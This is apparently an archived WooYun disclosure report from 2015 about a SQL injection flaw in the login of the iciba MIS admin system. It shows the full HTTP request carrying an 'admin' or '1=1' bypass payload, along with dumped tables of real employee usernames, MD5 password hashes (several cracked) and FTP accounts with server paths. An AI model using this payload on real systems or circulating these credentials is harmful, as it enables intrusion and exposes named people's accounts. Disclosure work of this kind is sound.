乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-14: 细节已通知厂商并且等待厂商处理中 2015-09-14: 厂商已经确认,细节仅向厂商公开 2015-09-24: 细节向核心白帽子及相关领域专家公开 2015-10-04: 细节向普通白帽子公开 2015-10-14: 细节向实习白帽子公开 2015-10-29: 细节向公众公开
RT
注入延伸
POST /index.php?action=post.login HTTP/1.1Host: mis.iciba.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://mis.iciba.com/index.php?action=loginContent-Length: 53Cookie: _ustat=%7B%22i%22%3A0%2C%22n%22%3A%22guest%22%2C%22e%22%3Anull%2C%22s%22%3A%7B%22e%22%3Afalse%2C%22m%22%3Afalse%2C%22u%22%3Afalse%7D%2C%22sid%22%3A%221b7603fb2ce89bcd4a5cb1200d85c702%22%7D; iciba_u_rand=c73ac4038e3bbc191a187644a1363e55%40101.71.243.74; iciba_u_rand_t=1442201527; Hm_lvt_ff8e5ea3d826cc3ff9e62f38fb25f05b=1442201530,1442201607; Hm_lpvt_ff8e5ea3d826cc3ff9e62f38fb25f05b=1442201607; PHPSESSID=30oo98co8vr2gl8pjjtrfimob4Connection: keep-alivePragma: no-cacheCache-Control: no-cacheusername=admin' or' 1=1 --&password=admin' or' 1=1
泄漏大量tftp和ftp帐号,已经解密
------+------------------------------------------------+----------+------+--------+---------------+| email | groupid | hash | lastlogin | mobile | password | realname | tftp | userid | username |+---------+---------+----------------------------------+---------------------+--------+------------------------------------------------+----------+------+--------+---------------+| NULL | 1 | NULL | 2015-08-20 16:39:08 | 0 | eb1e961e087cc34891781a5bb6bf6d4d | NULL | 0 | 40 | chenhui1 || NULL | 1 | NULL | 2014-08-08 09:21:32 | 0 | 99022fa4f427861213785e567b77130f (chenzeqing) | NULL | 0 | 35 | chenzeqing || NULL | 1 | NULL | 2015-08-25 10:13:39 | 0 | e9ff91372402d9453acc1fd1e020d3de (liuzhongjie) | NULL | 0 | 34 | liuzhongjie || NULL | 1 | NULL | 2014-05-08 13:30:49 | 0 | a4011069a80c1bb23626f9d96e63f35c (gaoqiang) | NULL | 1 | 32 | gaoqiang || NULL | 1 | NULL | 2015-08-14 17:08:02 | 0 | e10adc3949ba59abbe56e057f20f883e (123456) | NULL | 0 | 37 | liuhuan1 || NULL | 3 | NULL | 2015-08-24 21:22:55 | NULL | f314f877e377f12d10e8f49de949ed75 (yangfeng3) | NULL | 0 | 38 | yangfeng3 || NULL | 1 | NULL | 2013-11-04 19:25:50 | 0 | 8c69dea287bf25483062a2f4198f2815 (wangwenwu) | NULL | 0 | 24 | wangwenwu || NULL | 3 | NULL | 2013-05-27 09:47:33 | NULL | 22a780a3c1c4cc8a05f48fc31a8bd10b (jijunyi) | NULL | 0 | 22 | jijunyi || NULL | 1 | NULL | 2012-09-28 09:25:54 | 0 | e10adc3949ba59abbe56e057f20f883e (123456) | NULL | 1 | 18 | fuwei || NULL | 3 | NULL | 2015-05-13 09:57:06 | NULL | b3b297ee0728d31143315452d2c1abd6 | NULL | 0 | 12 | liushu || NULL | 3 | NULL | 2013-11-28 18:16:07 | NULL | e10adc3949ba59abbe56e057f20f883e (123456) | NULL | 0 | 21 | zhaohaifeng || NULL | 3 | NULL | 2015-08-03 10:02:03 | 0 | 60b5a35b5f398fa4e56f2f4ec8dacd7e (duanjing) | NULL | 1 | 5 | duanjing || NULL | 1 | NULL | 2015-09-14 11:30:35 | 0 | e10adc3949ba59abbe56e057f20f883e (123456) | NULL | 0 | 39 | wuyingbo || NULL | 1 | NULL | 2015-08-06 09:09:20 | 0 | bf669772743e7592d856a8054716fe20 | NULL | 0 | 36 | zuochengli || <blank> | 1 | 5ddf4332ba33189e29ac381f92844a0f | 2015-09-14 13:38:27 | 123456 | a9c5d68e918da87537b2710faa9e82e3 | <blank> | 1 | 1 | sunboyu1 || NULL | 1 | 69efa3abb53f00231ce65c15f9f4da47 | 2014-06-30 18:16:27 | 0 | 7cb3bb98353d2147e8cbb4c2860c82ab | NULL | 1 | 30 | guoqin || NULL | 3 | 9669a1df9334fd67985a63edc0ccf8ec | 2015-09-14 09:29:25 | NULL | fb555e44f59499569da31b8fdda24a2f | NULL | 0 | 29 | huangqiaoxiao || NULL | 3 | d101f60b0d6acb6d8378dc3be71168ea | 2015-09-14 09:08:35 | 0 | d6de90ba2e8a7c56a0dd68ae0ea3770b | <blank> | 0 | 2 | linsong |+---------+------------------------------+-------------+-----+----------+---------------------------------------------+------------+-----------+---------+-----+-------------+------------+| comment | Dir | DLBandwidth | Gid | ipaccess | Password | QuotaFiles | QuotaSize | status | Uid | ULBandwidth | User || <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | a9c5d68e918da87537b2710faa9e82e3 | 0 | 0 | <blank> | 500 | 0 | sunboyu1 || <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | f83dad5ca2f54453f144ffba72bbc2e3 | 0 | 0 | <blank> | 500 | 0 | zhangwei || <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | 3c131e7615ac9cec12ee08f2cb0cafa2 | 0 | 0 | <blank> | 500 | 0 | wuyufang || <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | c378d82ea995296c778d049d789d0702 | 0 | 0 | <blank> | 500 | 0 | tangqili || <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | e10adc3949ba59abbe56e057f20f883e (123456) | 0 | 0 | <blank> | 500 | 0 | zouyang || <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | e10adc3949ba59abbe56e057f20f883e (123456) | 0 | 0 | <blank> | 500 | 0 | fuwei || <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | e10adc3949ba59abbe56e057f20f883e (123456) | 0 | 0 | <blank> | 500 | 0 | fanjiangbo || <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | 60b5a35b5f398fa4e56f2f4ec8dacd7e (duanjing) | 0 | 0 | <blank> | 500 | 0 | duanjing || <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | 103daf33f40d42aa8adc533acdc6fb47 | 0 | 0 | <blank> | 500 | 0 | lisu || <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | 7cb3bb98353d2147e8cbb4c2860c82ab | 0 | 0 | <blank> | 500 | 0 | guoqin || <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | bc5fd432ca9496b7409851b6cd51728f | 0 | 0 | <blank> | 500 | 0 | gaoqiang || <blank> | /data/app/wap.iciba.com/www/ | 0 | 500 | * | aeee2196774691e2f8b315eeeac64f03 | 0 | 0 | 0 | 500 | 0 | duanjing1 |
POST /index.php?action=post.login HTTP/1.1 Host: mis.iciba.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://mis.iciba.com/index.php?action=login Content-Length: 53 Cookie: _ustat=%7B%22i%22%3A0%2C%22n%22%3A%22guest%22%2C%22e%22%3Anull%2C%22s%22%3A%7B%22e%22%3Afalse%2C%22m%22%3Afalse%2C%22u%22%3Afalse%7D%2C%22sid%22%3A%221b7603fb2ce89bcd4a5cb1200d85c702%22%7D; iciba_u_rand=c73ac4038e3bbc191a187644a1363e55%40101.71.243.74; iciba_u_rand_t=1442201527; Hm_lvt_ff8e5ea3d826cc3ff9e62f38fb25f05b=1442201530,1442201607; Hm_lpvt_ff8e5ea3d826cc3ff9e62f38fb25f05b=1442201607; PHPSESSID=30oo98co8vr2gl8pjjtrfimob4 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache username=admin' or' 1=1 --&password=admin' or' 1=1
------+------------------------------------------------+----------+------+------ --+---------------+ | email | groupid | hash | lastlogin | m obile | password | realname | tftp | useri d | username | +---------+---------+----------------------------------+---------------------+-- ------+------------------------------------------------+----------+------+------ --+---------------+ | NULL | 1 | NULL | 2015-08-20 16:39:08 | 0 | eb1e961e087cc34891781a5bb6bf6d4d | NULL | 0 | 40 | chenhui1 | | NULL | 1 | NULL | 2014-08-08 09:21:32 | 0 | 99022fa4f427861213785e567b77130f (chenzeqing) | NULL | 0 | 35 | chenzeqing | | NULL | 1 | NULL | 2015-08-25 10:13:39 | 0 | e9ff91372402d9453acc1fd1e020d3de (liuzhongjie) | NULL | 0 | 34 | liuzhongjie | | NULL | 1 | NULL | 2014-05-08 13:30:49 | 0 | a4011069a80c1bb23626f9d96e63f35c (gaoqiang) | NULL | 1 | 32 | gaoqiang | | NULL | 1 | NULL | 2015-08-14 17:08:02 | 0 | e10adc3949ba59abbe56e057f20f883e (123456) | NULL | 0 | 37 | liuhuan1 | | NULL | 3 | NULL | 2015-08-24 21:22:55 | N ULL | f314f877e377f12d10e8f49de949ed75 (yangfeng3) | NULL | 0 | 38 | yangfeng3 | | NULL | 1 | NULL | 2013-11-04 19:25:50 | 0 | 8c69dea287bf25483062a2f4198f2815 (wangwenwu) | NULL | 0 | 24 | wangwenwu | | NULL | 3 | NULL | 2013-05-27 09:47:33 | N ULL | 22a780a3c1c4cc8a05f48fc31a8bd10b (jijunyi) | NULL | 0 | 22 | jijunyi | | NULL | 1 | NULL | 2012-09-28 09:25:54 | 0 | e10adc3949ba59abbe56e057f20f883e (123456) | NULL | 1 | 18 | fuwei | | NULL | 3 | NULL | 2015-05-13 09:57:06 | N ULL | b3b297ee0728d31143315452d2c1abd6 | NULL | 0 | 12 | liushu | | NULL | 3 | NULL | 2013-11-28 18:16:07 | N ULL | e10adc3949ba59abbe56e057f20f883e (123456) | NULL | 0 | 21 | zhaohaifeng | | NULL | 3 | NULL | 2015-08-03 10:02:03 | 0 | 60b5a35b5f398fa4e56f2f4ec8dacd7e (duanjing) | NULL | 1 | 5 | duanjing | | NULL | 1 | NULL | 2015-09-14 11:30:35 | 0 | e10adc3949ba59abbe56e057f20f883e (123456) | NULL | 0 | 39 | wuyingbo | | NULL | 1 | NULL | 2015-08-06 09:09:20 | 0 | bf669772743e7592d856a8054716fe20 | NULL | 0 | 36 | zuochengli | | <blank> | 1 | 5ddf4332ba33189e29ac381f92844a0f | 2015-09-14 13:38:27 | 1 23456 | a9c5d68e918da87537b2710faa9e82e3 | <blank> | 1 | 1 | sunboyu1 | | NULL | 1 | 69efa3abb53f00231ce65c15f9f4da47 | 2014-06-30 18:16:27 | 0 | 7cb3bb98353d2147e8cbb4c2860c82ab | NULL | 1 | 30 | guoqin | | NULL | 3 | 9669a1df9334fd67985a63edc0ccf8ec | 2015-09-14 09:29:25 | N ULL | fb555e44f59499569da31b8fdda24a2f | NULL | 0 | 29 | huangqiaoxiao | | NULL | 3 | d101f60b0d6acb6d8378dc3be71168ea | 2015-09-14 09:08:35 | 0 | d6de90ba2e8a7c56a0dd68ae0ea3770b | <blank> | 0 | 2 | linsong | +---------+------------------------------+-------------+-----+----------+------- --------------------------------------+------------+-----------+---------+-----+ -------------+------------+ | comment | Dir | DLBandwidth | Gid | ipaccess | Passwo rd | QuotaFiles | QuotaSize | status | Uid | ULBandwidth | User | | <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | a9c5d6 8e918da87537b2710faa9e82e3 | 0 | 0 | <blank> | 500 | 0 | sunboyu1 | | <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | f83dad 5ca2f54453f144ffba72bbc2e3 | 0 | 0 | <blank> | 500 | 0 | zhangwei | | <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | 3c131e 7615ac9cec12ee08f2cb0cafa2 | 0 | 0 | <blank> | 500 | 0 | wuyufang | | <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | c378d8 2ea995296c778d049d789d0702 | 0 | 0 | <blank> | 500 | 0 | tangqili | | <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | e10adc 3949ba59abbe56e057f20f883e (123456) | 0 | 0 | <blank> | 500 | 0 | zouyang | | <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | e10adc 3949ba59abbe56e057f20f883e (123456) | 0 | 0 | <blank> | 500 | 0 | fuwei | | <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | e10adc 3949ba59abbe56e057f20f883e (123456) | 0 | 0 | <blank> | 500 | 0 | fanjiangbo | | <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | 60b5a3 5b5f398fa4e56f2f4ec8dacd7e (duanjing) | 0 | 0 | <blank> | 500 | 0 | duanjing | | <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | 103daf 33f40d42aa8adc533acdc6fb47 | 0 | 0 | <blank> | 500 | 0 | lisu | | <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | 7cb3bb 98353d2147e8cbb4c2860c82ab | 0 | 0 | <blank> | 500 | 0 | guoqin | | <blank> | /data/app/cdn.iciba.com/web | 0 | 500 | * | bc5fd4 32ca9496b7409851b6cd51728f | 0 | 0 | <blank> | 500 | 0 | gaoqiang | | <blank> | /data/app/wap.iciba.com/www/ | 0 | 500 | * | aeee21 96774691e2f8b315eeeac64f03 | 0 | 0 | 0 | 500 | 0 | duanjing1 |
随便选个chenzeqing chenzeqing登入MIS管理系统
危害等级:中
漏洞Rank:10
确认时间:2015-09-14 14:53
感谢提交,马上跟进处理
暂无
![)K%Z}5TH7_M]4}C8V{4JTHN.jpg](http://wimg.zone.ci/upload/201509/14141603611f61a5ff5f51edf4ff18c7d113fd4f.jpg)
